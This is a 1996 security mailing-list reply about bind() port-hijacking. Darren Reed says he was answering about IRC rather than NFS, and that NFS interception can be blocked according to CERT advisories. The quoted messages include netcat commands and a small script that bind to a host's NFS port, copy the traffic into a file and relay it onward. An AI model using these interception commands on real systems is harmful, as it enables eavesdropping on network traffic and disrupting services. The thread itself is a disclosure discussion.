Re: BoS: bind() Security Problems

[avalon () coombs anu edu au (Darren Reed)]

In some mail from invalid opcode, sie said:
> Yes, but if you do this:
> netcat -lvv -s 192.88.209.5 -p 2049 -e exploit.sh&
>
> exploit.sh:
> tee crap | netcat 192.88.209.5 2049
>
> and than you can capture it all to the file: crap, and redirect it to the
> original port.

A couple of things.  First, I answered the comments about IRC, not NFS.
My comments were not at all relevant to NFS (maybe I should have
deleted more text).

Second, you can prevent the above from working (see CERT Advisories on
NFS security problems) so that all that really does happen is you stop
the NFS packets reaching their real destination.  This latter bit is,
as the original poster mentioned, not able to be prevented easily on
most operating systems, commercially available today.

darren.

> On Thu, 1 Feb 1996, Darren Reed wrote:
>
> > In some mail from Bernd Lehle, sie said:
> > [...]
> > > > Exploit:
> > > [..]
> > > > Run netcat:
> > > >
> > > > w00p% nc -v -v -u -s 192.88.209.5 -p 2049
> > > > listening on [192.88.209.5] 2049 ...
> > >
> > > To take a look at irc packets: nc -v -v -l -s Your.IP.Adress -p 6667
> >
> > This won't get you messages between already connected clients and servers.
> >
> > Yes, you might be able to make clients connect, at first, to you and not
> > a real server, but it is going to be obvious to the client: the connection
> > won't complete as netcat won't generate the server replies which many
> > clients now look for to indicate the confirmation of a connection.